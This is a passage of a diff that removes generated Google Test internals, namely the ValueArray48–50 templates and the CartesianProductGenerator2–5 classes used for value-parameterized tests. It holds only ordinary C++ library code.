-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48>
-class ValueArray48 {
- public:
-  ValueArray48(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-      T42 v42, T43 v43, T44 v44, T45 v45, T46 v46, T47 v47, T48 v48) : v1_(v1),
-      v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9),
-      v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15),
-      v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21),
-      v22_(v22), v23_(v23), v24_(v24), v25_(v25), v26_(v26), v27_(v27),
-      v28_(v28), v29_(v29), v30_(v30), v31_(v31), v32_(v32), v33_(v33),
-      v34_(v34), v35_(v35), v36_(v36), v37_(v37), v38_(v38), v39_(v39),
-      v40_(v40), v41_(v41), v42_(v42), v43_(v43), v44_(v44), v45_(v45),
-      v46_(v46), v47_(v47), v48_(v48) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_), static_cast<T>(v41_),
-        static_cast<T>(v42_), static_cast<T>(v43_), static_cast<T>(v44_),
-        static_cast<T>(v45_), static_cast<T>(v46_), static_cast<T>(v47_),
-        static_cast<T>(v48_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray48& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-  const T41 v41_;
-  const T42 v42_;
-  const T43 v43_;
-  const T44 v44_;
-  const T45 v45_;
-  const T46 v46_;
-  const T47 v47_;
-  const T48 v48_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48, typename T49>
-class ValueArray49 {
- public:
-  ValueArray49(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-      T42 v42, T43 v43, T44 v44, T45 v45, T46 v46, T47 v47, T48 v48,
-      T49 v49) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14),
-      v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20),
-      v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25), v26_(v26),
-      v27_(v27), v28_(v28), v29_(v29), v30_(v30), v31_(v31), v32_(v32),
-      v33_(v33), v34_(v34), v35_(v35), v36_(v36), v37_(v37), v38_(v38),
-      v39_(v39), v40_(v40), v41_(v41), v42_(v42), v43_(v43), v44_(v44),
-      v45_(v45), v46_(v46), v47_(v47), v48_(v48), v49_(v49) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_), static_cast<T>(v41_),
-        static_cast<T>(v42_), static_cast<T>(v43_), static_cast<T>(v44_),
-        static_cast<T>(v45_), static_cast<T>(v46_), static_cast<T>(v47_),
-        static_cast<T>(v48_), static_cast<T>(v49_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray49& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-  const T41 v41_;
-  const T42 v42_;
-  const T43 v43_;
-  const T44 v44_;
-  const T45 v45_;
-  const T46 v46_;
-  const T47 v47_;
-  const T48 v48_;
-  const T49 v49_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48, typename T49, typename T50>
-class ValueArray50 {
- public:
-  ValueArray50(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-      T42 v42, T43 v43, T44 v44, T45 v45, T46 v46, T47 v47, T48 v48, T49 v49,
-      T50 v50) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14),
-      v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20),
-      v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25), v26_(v26),
-      v27_(v27), v28_(v28), v29_(v29), v30_(v30), v31_(v31), v32_(v32),
-      v33_(v33), v34_(v34), v35_(v35), v36_(v36), v37_(v37), v38_(v38),
-      v39_(v39), v40_(v40), v41_(v41), v42_(v42), v43_(v43), v44_(v44),
-      v45_(v45), v46_(v46), v47_(v47), v48_(v48), v49_(v49), v50_(v50) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_), static_cast<T>(v41_),
-        static_cast<T>(v42_), static_cast<T>(v43_), static_cast<T>(v44_),
-        static_cast<T>(v45_), static_cast<T>(v46_), static_cast<T>(v47_),
-        static_cast<T>(v48_), static_cast<T>(v49_), static_cast<T>(v50_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray50& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-  const T41 v41_;
-  const T42 v42_;
-  const T43 v43_;
-  const T44 v44_;
-  const T45 v45_;
-  const T46 v46_;
-  const T47 v47_;
-  const T48 v48_;
-  const T49 v49_;
-  const T50 v50_;
-};
-
-# if GTEST_HAS_COMBINE
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// Generates values from the Cartesian product of values produced
-// by the argument generators.
-//
-template <typename T1, typename T2>
-class CartesianProductGenerator2
-    : public ParamGeneratorInterface< ::testing::tuple<T1, T2> > {
- public:
-  typedef ::testing::tuple<T1, T2> ParamType;
-
-  CartesianProductGenerator2(const ParamGenerator<T1>& g1,
-      const ParamGenerator<T2>& g2)
-      : g1_(g1), g2_(g2) {}
-  virtual ~CartesianProductGenerator2() {}
-
-  virtual ParamIteratorInterface<ParamType>* Begin() const {
-    return new Iterator(this, g1_, g1_.begin(), g2_, g2_.begin());
-  }
-  virtual ParamIteratorInterface<ParamType>* End() const {
-    return new Iterator(this, g1_, g1_.end(), g2_, g2_.end());
-  }
-
- private:
-  class Iterator : public ParamIteratorInterface<ParamType> {
-   public:
-    Iterator(const ParamGeneratorInterface<ParamType>* base,
-      const ParamGenerator<T1>& g1,
-      const typename ParamGenerator<T1>::iterator& current1,
-      const ParamGenerator<T2>& g2,
-      const typename ParamGenerator<T2>::iterator& current2)
-        : base_(base),
-          begin1_(g1.begin()), end1_(g1.end()), current1_(current1),
-          begin2_(g2.begin()), end2_(g2.end()), current2_(current2)    {
-      ComputeCurrentValue();
-    }
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<ParamType>* BaseGenerator() const {
-      return base_;
-    }
-    // Advance should not be called on beyond-of-range iterators
-    // so no component iterators must be beyond end of range, either.
-    virtual void Advance() {
-      assert(!AtEnd());
-      ++current2_;
-      if (current2_ == end2_) {
-        current2_ = begin2_;
-        ++current1_;
-      }
-      ComputeCurrentValue();
-    }
-    virtual ParamIteratorInterface<ParamType>* Clone() const {
-      return new Iterator(*this);
-    }
-    virtual const ParamType* Current() const { return &current_value_; }
-    virtual bool Equals(const ParamIteratorInterface<ParamType>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      const Iterator* typed_other =
-          CheckedDowncastToActualType<const Iterator>(&other);
-      // We must report iterators equal if they both point beyond their
-      // respective ranges. That can happen in a variety of fashions,
-      // so we have to consult AtEnd().
-      return (AtEnd() && typed_other->AtEnd()) ||
-         (
-          current1_ == typed_other->current1_ &&
-          current2_ == typed_other->current2_);
-    }
-
-   private:
-    Iterator(const Iterator& other)
-        : base_(other.base_),
-        begin1_(other.begin1_),
-        end1_(other.end1_),
-        current1_(other.current1_),
-        begin2_(other.begin2_),
-        end2_(other.end2_),
-        current2_(other.current2_) {
-      ComputeCurrentValue();
-    }
-
-    void ComputeCurrentValue() {
-      if (!AtEnd())
-        current_value_ = ParamType(*current1_, *current2_);
-    }
-    bool AtEnd() const {
-      // We must report iterator past the end of the range when either of the
-      // component iterators has reached the end of its range.
-      return
-          current1_ == end1_ ||
-          current2_ == end2_;
-    }
-
-    // No implementation - assignment is unsupported.
-    void operator=(const Iterator& other);
-
-    const ParamGeneratorInterface<ParamType>* const base_;
-    // begin[i]_ and end[i]_ define the i-th range that Iterator traverses.
-    // current[i]_ is the actual traversing iterator.
-    const typename ParamGenerator<T1>::iterator begin1_;
-    const typename ParamGenerator<T1>::iterator end1_;
-    typename ParamGenerator<T1>::iterator current1_;
-    const typename ParamGenerator<T2>::iterator begin2_;
-    const typename ParamGenerator<T2>::iterator end2_;
-    typename ParamGenerator<T2>::iterator current2_;
-    ParamType current_value_;
-  };  // class CartesianProductGenerator2::Iterator
-
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductGenerator2& other);
-
-  const ParamGenerator<T1> g1_;
-  const ParamGenerator<T2> g2_;
-};  // class CartesianProductGenerator2
-
-
-template <typename T1, typename T2, typename T3>
-class CartesianProductGenerator3
-    : public ParamGeneratorInterface< ::testing::tuple<T1, T2, T3> > {
- public:
-  typedef ::testing::tuple<T1, T2, T3> ParamType;
-
-  CartesianProductGenerator3(const ParamGenerator<T1>& g1,
-      const ParamGenerator<T2>& g2, const ParamGenerator<T3>& g3)
-      : g1_(g1), g2_(g2), g3_(g3) {}
-  virtual ~CartesianProductGenerator3() {}
-
-  virtual ParamIteratorInterface<ParamType>* Begin() const {
-    return new Iterator(this, g1_, g1_.begin(), g2_, g2_.begin(), g3_,
-        g3_.begin());
-  }
-  virtual ParamIteratorInterface<ParamType>* End() const {
-    return new Iterator(this, g1_, g1_.end(), g2_, g2_.end(), g3_, g3_.end());
-  }
-
- private:
-  class Iterator : public ParamIteratorInterface<ParamType> {
-   public:
-    Iterator(const ParamGeneratorInterface<ParamType>* base,
-      const ParamGenerator<T1>& g1,
-      const typename ParamGenerator<T1>::iterator& current1,
-      const ParamGenerator<T2>& g2,
-      const typename ParamGenerator<T2>::iterator& current2,
-      const ParamGenerator<T3>& g3,
-      const typename ParamGenerator<T3>::iterator& current3)
-        : base_(base),
-          begin1_(g1.begin()), end1_(g1.end()), current1_(current1),
-          begin2_(g2.begin()), end2_(g2.end()), current2_(current2),
-          begin3_(g3.begin()), end3_(g3.end()), current3_(current3)    {
-      ComputeCurrentValue();
-    }
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<ParamType>* BaseGenerator() const {
-      return base_;
-    }
-    // Advance should not be called on beyond-of-range iterators
-    // so no component iterators must be beyond end of range, either.
-    virtual void Advance() {
-      assert(!AtEnd());
-      ++current3_;
-      if (current3_ == end3_) {
-        current3_ = begin3_;
-        ++current2_;
-      }
-      if (current2_ == end2_) {
-        current2_ = begin2_;
-        ++current1_;
-      }
-      ComputeCurrentValue();
-    }
-    virtual ParamIteratorInterface<ParamType>* Clone() const {
-      return new Iterator(*this);
-    }
-    virtual const ParamType* Current() const { return &current_value_; }
-    virtual bool Equals(const ParamIteratorInterface<ParamType>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      const Iterator* typed_other =
-          CheckedDowncastToActualType<const Iterator>(&other);
-      // We must report iterators equal if they both point beyond their
-      // respective ranges. That can happen in a variety of fashions,
-      // so we have to consult AtEnd().
-      return (AtEnd() && typed_other->AtEnd()) ||
-         (
-          current1_ == typed_other->current1_ &&
-          current2_ == typed_other->current2_ &&
-          current3_ == typed_other->current3_);
-    }
-
-   private:
-    Iterator(const Iterator& other)
-        : base_(other.base_),
-        begin1_(other.begin1_),
-        end1_(other.end1_),
-        current1_(other.current1_),
-        begin2_(other.begin2_),
-        end2_(other.end2_),
-        current2_(other.current2_),
-        begin3_(other.begin3_),
-        end3_(other.end3_),
-        current3_(other.current3_) {
-      ComputeCurrentValue();
-    }
-
-    void ComputeCurrentValue() {
-      if (!AtEnd())
-        current_value_ = ParamType(*current1_, *current2_, *current3_);
-    }
-    bool AtEnd() const {
-      // We must report iterator past the end of the range when either of the
-      // component iterators has reached the end of its range.
-      return
-          current1_ == end1_ ||
-          current2_ == end2_ ||
-          current3_ == end3_;
-    }
-
-    // No implementation - assignment is unsupported.
-    void operator=(const Iterator& other);
-
-    const ParamGeneratorInterface<ParamType>* const base_;
-    // begin[i]_ and end[i]_ define the i-th range that Iterator traverses.
-    // current[i]_ is the actual traversing iterator.
-    const typename ParamGenerator<T1>::iterator begin1_;
-    const typename ParamGenerator<T1>::iterator end1_;
-    typename ParamGenerator<T1>::iterator current1_;
-    const typename ParamGenerator<T2>::iterator begin2_;
-    const typename ParamGenerator<T2>::iterator end2_;
-    typename ParamGenerator<T2>::iterator current2_;
-    const typename ParamGenerator<T3>::iterator begin3_;
-    const typename ParamGenerator<T3>::iterator end3_;
-    typename ParamGenerator<T3>::iterator current3_;
-    ParamType current_value_;
-  };  // class CartesianProductGenerator3::Iterator
-
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductGenerator3& other);
-
-  const ParamGenerator<T1> g1_;
-  const ParamGenerator<T2> g2_;
-  const ParamGenerator<T3> g3_;
-};  // class CartesianProductGenerator3
-
-
-template <typename T1, typename T2, typename T3, typename T4>
-class CartesianProductGenerator4
-    : public ParamGeneratorInterface< ::testing::tuple<T1, T2, T3, T4> > {
- public:
-  typedef ::testing::tuple<T1, T2, T3, T4> ParamType;
-
-  CartesianProductGenerator4(const ParamGenerator<T1>& g1,
-      const ParamGenerator<T2>& g2, const ParamGenerator<T3>& g3,
-      const ParamGenerator<T4>& g4)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4) {}
-  virtual ~CartesianProductGenerator4() {}
-
-  virtual ParamIteratorInterface<ParamType>* Begin() const {
-    return new Iterator(this, g1_, g1_.begin(), g2_, g2_.begin(), g3_,
-        g3_.begin(), g4_, g4_.begin());
-  }
-  virtual ParamIteratorInterface<ParamType>* End() const {
-    return new Iterator(this, g1_, g1_.end(), g2_, g2_.end(), g3_, g3_.end(),
-        g4_, g4_.end());
-  }
-
- private:
-  class Iterator : public ParamIteratorInterface<ParamType> {
-   public:
-    Iterator(const ParamGeneratorInterface<ParamType>* base,
-      const ParamGenerator<T1>& g1,
-      const typename ParamGenerator<T1>::iterator& current1,
-      const ParamGenerator<T2>& g2,
-      const typename ParamGenerator<T2>::iterator& current2,
-      const ParamGenerator<T3>& g3,
-      const typename ParamGenerator<T3>::iterator& current3,
-      const ParamGenerator<T4>& g4,
-      const typename ParamGenerator<T4>::iterator& current4)
-        : base_(base),
-          begin1_(g1.begin()), end1_(g1.end()), current1_(current1),
-          begin2_(g2.begin()), end2_(g2.end()), current2_(current2),
-          begin3_(g3.begin()), end3_(g3.end()), current3_(current3),
-          begin4_(g4.begin()), end4_(g4.end()), current4_(current4)    {
-      ComputeCurrentValue();
-    }
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<ParamType>* BaseGenerator() const {
-      return base_;
-    }
-    // Advance should not be called on beyond-of-range iterators
-    // so no component iterators must be beyond end of range, either.
-    virtual void Advance() {
-      assert(!AtEnd());
-      ++current4_;
-      if (current4_ == end4_) {
-        current4_ = begin4_;
-        ++current3_;
-      }
-      if (current3_ == end3_) {
-        current3_ = begin3_;
-        ++current2_;
-      }
-      if (current2_ == end2_) {
-        current2_ = begin2_;
-        ++current1_;
-      }
-      ComputeCurrentValue();
-    }
-    virtual ParamIteratorInterface<ParamType>* Clone() const {
-      return new Iterator(*this);
-    }
-    virtual const ParamType* Current() const { return &current_value_; }
-    virtual bool Equals(const ParamIteratorInterface<ParamType>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      const Iterator* typed_other =
-          CheckedDowncastToActualType<const Iterator>(&other);
-      // We must report iterators equal if they both point beyond their
-      // respective ranges. That can happen in a variety of fashions,
-      // so we have to consult AtEnd().
-      return (AtEnd() && typed_other->AtEnd()) ||
-         (
-          current1_ == typed_other->current1_ &&
-          current2_ == typed_other->current2_ &&
-          current3_ == typed_other->current3_ &&
-          current4_ == typed_other->current4_);
-    }
-
-   private:
-    Iterator(const Iterator& other)
-        : base_(other.base_),
-        begin1_(other.begin1_),
-        end1_(other.end1_),
-        current1_(other.current1_),
-        begin2_(other.begin2_),
-        end2_(other.end2_),
-        current2_(other.current2_),
-        begin3_(other.begin3_),
-        end3_(other.end3_),
-        current3_(other.current3_),
-        begin4_(other.begin4_),
-        end4_(other.end4_),
-        current4_(other.current4_) {
-      ComputeCurrentValue();
-    }
-
-    void ComputeCurrentValue() {
-      if (!AtEnd())
-        current_value_ = ParamType(*current1_, *current2_, *current3_,
-            *current4_);
-    }
-    bool AtEnd() const {
-      // We must report iterator past the end of the range when either of the
-      // component iterators has reached the end of its range.
-      return
-          current1_ == end1_ ||
-          current2_ == end2_ ||
-          current3_ == end3_ ||
-          current4_ == end4_;
-    }
-
-    // No implementation - assignment is unsupported.
-    void operator=(const Iterator& other);
-
-    const ParamGeneratorInterface<ParamType>* const base_;
-    // begin[i]_ and end[i]_ define the i-th range that Iterator traverses.
-    // current[i]_ is the actual traversing iterator.
-    const typename ParamGenerator<T1>::iterator begin1_;
-    const typename ParamGenerator<T1>::iterator end1_;
-    typename ParamGenerator<T1>::iterator current1_;
-    const typename ParamGenerator<T2>::iterator begin2_;
-    const typename ParamGenerator<T2>::iterator end2_;
-    typename ParamGenerator<T2>::iterator current2_;
-    const typename ParamGenerator<T3>::iterator begin3_;
-    const typename ParamGenerator<T3>::iterator end3_;
-    typename ParamGenerator<T3>::iterator current3_;
-    const typename ParamGenerator<T4>::iterator begin4_;
-    const typename ParamGenerator<T4>::iterator end4_;
-    typename ParamGenerator<T4>::iterator current4_;
-    ParamType current_value_;
-  };  // class CartesianProductGenerator4::Iterator
-
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductGenerator4& other);
-
-  const ParamGenerator<T1> g1_;
-  const ParamGenerator<T2> g2_;
-  const ParamGenerator<T3> g3_;
-  const ParamGenerator<T4> g4_;
-};  // class CartesianProductGenerator4
-
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5>
-class CartesianProductGenerator5
-    : public ParamGeneratorInterface< ::testing::tuple<T1, T2, T3, T4, T5> > {
- public:
-  typedef ::testing::tuple<T1, T2, T3, T4, T5> ParamType;
-
-  CartesianProductGenerator5(const ParamGenerator<T1>& g1,
-      const ParamGenerator<T2>& g2, const ParamGenerator<T3>& g3,
-      const ParamGenerator<T4>& g4, const ParamGenerator<T5>& g5)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5) {}
-  virtual ~CartesianProductGenerator5() {}
-
-  virtual ParamIteratorInterface<ParamType>* Begin() const {
-    return new Iterator(this, g1_, g1_.begin(), g2_, g2_.begin(), g3_,
-        g3_.begin(), g4_, g4_.begin(), g5_, g5_.begin());
-  }
-  virtual ParamIteratorInterface<ParamType>* End() const {
-    return new Iterator(this, g1_, g1_.end(), g2_, g2_.end(), g3_, g3_.end(),
-        g4_, g4_.end(), g5_, g5_.end());
-  }
-
- private:
-  class Iterator : public ParamIteratorInterface<ParamType> {
-   public:
-    Iterator(const ParamGeneratorInterface<ParamType>* base,
-      const ParamGenerator<T1>& g1,
-      const typename ParamGenerator<T1>::iterator& current1,
-      const ParamGenerator<T2>& g2,
-      const typename ParamGenerator<T2>::iterator& current2,
-      const ParamGenerator<T3>& g3,
-      const typename ParamGenerator<T3>::iterator& current3,
-      const ParamGenerator<T4>& g4,
-      const typename ParamGenerator<T4>::iterator& current4,
-      const ParamGenerator<T5>& g5,
-      const typename ParamGenerator<T5>::iterator& current5)
-        : base_(base),
-          begin1_(g1.begin()), end1_(g1.end()), current1_(current1),
-          begin2_(g2.begin()), end2_(g2.end()), current2_(current2),
-          begin3_(g3.begin()), end3_(g3.end()), current3_(current3),
-          begin4_(g4.begin()), end4_(g4.end()), current4_(current4),
-          begin5_(g5.begin()), end5_(g5.end()), current5_(current5)    {
-      ComputeCurrentValue();
-    }
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<ParamType>* BaseGenerator() const {
-      return base_;
-    }
-    // Advance should not be called on beyond-of-range iterators
-    // so no component iterators must be beyond end of range, either.
-    virtual void Advance() {
-      assert(!AtEnd());
-      ++current5_;
-      if (current5_ == end5_) {
-        current5_ = begin5_;
-        ++current4_;
-      }
-      if (current4_ == end4_) {
-        current4_ = begin4_;
-        ++current3_;
-      }
-      if (current3_ == end3_) {
-        current3_ = begin3_;
-        ++current2_;
-      }
-      if (current2_ == end2_) {
-        current2_ = begin2_;
-        ++current1_;
-      }
-      ComputeCurrentValue();
-    }
-    virtual ParamIteratorInterface<ParamType>* Clone() const {
-      return new Iterator(*this);
-    }
-    virtual const ParamType* Current() const { return &current_value_; }
-    virtual bool Equals(const ParamIteratorInterface<ParamType>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      const Iterator* typed_other =
-          CheckedDowncastToActualType<const Iterator>(&other);
-      // We must report iterators equal if they both point beyond their
